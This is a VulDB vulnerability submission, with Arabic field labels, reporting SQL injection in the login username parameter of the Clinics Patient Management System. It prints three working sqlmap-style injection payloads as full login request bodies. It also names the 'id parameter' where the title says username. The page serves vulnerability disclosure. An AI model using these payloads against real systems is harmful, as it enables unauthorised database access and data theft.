إرسال #94401: Sql injection exists in username parameter of clinics patient management systemالمعلومات

عنوان	Sql injection exists in username parameter of clinics patient management system
الوصف	SQL injection vulnerability exists in id parameter of index.php file of clinics patient management system.Using sqlmap to inject it, you can get the result of Boolean blind injection, which means that an ordinary user can obtain all the information in the database Payload：user_name=admin' AND 7611=7611 AND 'UDzF'='UDzF&password=admin123&login= or user_name=admin' AND GTID_SUBSET(CONCAT(0x716a7a7171,(SELECT (ELT(7705=7705,1))),0x717a6b6a71),7705) AND 'iREO'='iREO&password=admin123&login= or user_name=admin' AND (SELECT 6807 FROM (SELECT(SLEEP(5)))kKcA) AND 'YvzK'='YvzK&password=admin123&login=
المصدر	⚠️ https://github.com/E1CHO/cve_hub/blob/main/clinics%20patient%20management%20system/clinics-patient-management-system%20vlun1.pdf
المستخدم	SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
ارسال	25/02/2023 04:38 AM (3 سنوات منذ)
الاعتدال	25/02/2023 08:51 AM (4 hours later)
الحالة	مكرر
إدخال VulDB	207847 [SourceCodester Clinics Patient Management System Login index.php user_name حقن SQL]
النقاط	0

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!